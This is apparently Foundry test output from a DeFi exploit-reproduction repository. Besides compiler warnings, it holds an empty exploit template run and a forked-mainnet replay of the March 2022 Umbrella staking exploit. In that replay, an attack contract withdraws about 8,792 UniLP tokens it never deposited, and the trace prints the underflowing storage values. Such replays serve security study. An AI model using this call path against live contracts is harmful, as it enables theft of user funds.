Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.22s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 726.84ms (7.17ms CPU time)

Ran 1 test for src/test/2022-03/Umbrella_exp.sol:AttackContract
[PASS] testExploit() (gas: 105362)
Logs:
  Before exploiting, Attacker UniLP Balance: 0.000000000000000000
  After exploiting, Attacker UniLP Balance: 8792.873290680252648282

Traces:
  [3644] AttackContract::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 14421983 [1.442e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [117762] AttackContract::testExploit()
    ├─ [2480] 0xB1BbeEa2dA2905E6B0A30203aEf55c399C53D042::balanceOf(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "Before exploiting, Attacker UniLP Balance", val: 0, decimals: 18)
    ├─ [101832] 0xB3FB1D01B07A706736Ca175f827e4F56021b85dE::withdraw(8792873290680252648282 [8.792e21])
    │   ├─ [27840] 0xB1BbeEa2dA2905E6B0A30203aEf55c399C53D042::transfer(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 8792873290680252648282 [8.792e21])
    │   │   ├─ emit Transfer(from: 0xB3FB1D01B07A706736Ca175f827e4F56021b85dE, to: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 8792873290680252648282 [8.792e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x96806f5b0d49251df5bad161fc15f515ee8d83a2d0693aa54e8f37cbdc6fdf67: 0x0000000000000000000000000000000000000000000001dca9a1373c007e4b5a → 0
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000001dca9a1373c007e4b5a
    │   │   └─ ← [Return] true
    │   ├─ emit Withdrawn(param0: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 8792873290680252648282 [8.792e21])
    │   ├─  storage changes:
    │   │   @ 8: 0x0000000000000000000000000000000000000000000001dca9a1373c007e4b5a → 0
    │   │   @ 5: 0x0000000000000000000000000000000000000000000000016a613748b6f53c0c → 0x0000000000000000000000000000000000000000000000016cd5849d02b57996
    │   │   @ 10: 0x0000000000000000000082c48e0b679c480000006236c2de00278d006259ac03 → 0x0000000000000000000082c48e0b679c480000006236dc5d00278d006259ac03
    │   │   @ 0xed79f5a6103cc2504e2b88abca652130eac5b790c6ddb9e498c6f724905db5d9: 0 → 0x0000000000000000000000000000000000000000000000016cd5849d02b57996
    │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0xfffffffffffffffffffffffffffffffffffffffffffffe23565ec8c3ff81b4a6
    │   └─ ← [Stop]
    ├─ [480] 0xB1BbeEa2dA2905E6B0A30203aEf55c399C53D042::balanceOf(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 8792873290680252648282 [8.792e21]
    ├─ emit log_named_decimal_uint(key: "After exploiting, Attacker UniLP Balance", val: 8792873290680252648282 [8.792e21], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 5.57s (3.68s CPU time)

Ran 2 test suites in 5.57s (6.29s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
